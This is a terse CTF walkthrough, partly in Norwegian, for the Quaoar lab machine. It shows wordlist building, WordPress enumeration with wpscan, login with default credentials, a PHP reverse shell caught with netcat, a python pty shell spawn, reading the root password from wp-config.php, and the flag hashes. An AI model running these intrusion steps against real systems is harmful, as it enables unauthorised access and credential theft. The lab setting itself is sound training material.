Quaoar - written by chris

nmap

generere ordliste

cewl -d 0 -m 5 -w /root/Desktop/quaoar.lst

https://en.wikipedia.org/wiki/50000_Quoaor

sort -u /root/Desktop/quaoar.lst

>

/root/Desktop/quaoar2.

tr '[:upper:]' '[:lower:]'

<

/root/Desktop/quaoar2.lst

>

/root/Desktop/quoar

john --wordlist=/root/Desktop/quaoar.lst --rules --stdout

>

/root/Desktop/qua

wpscan --url http://10.0.0.10/wordpress --enumerate uap

fant loginadmin admin og wpuser wpuser

lastet opp php-reverse-shell og connectet med

nc -lvp 4444

got shell med www-data som bruker

spawne shell med python

python -c 'import pty;pty.spawn("/bin/bash")'

fant flag

[email protected]:/home/wpadmin$ cat fl

cat flag.txt

2bafe61f03117ac66a73c3c514de796e

prøver å finne noe root fun

find / -perm -4000 -user root 2>/dev/null

funket ikke

sjekker ut wordpress directory og grepper etter root

sjekk /var/www/wordpress/wp-config.php først!

fant root password rootpassword!

flag i /root

8e3f9ec016e3598c5eec11fd3d73f6fb

cat /etc/cron.d avslører en cron-fil php5. der var flag

d46795f84148fd338603d0d6a9dbf8de

results matching ""

    No results matching ""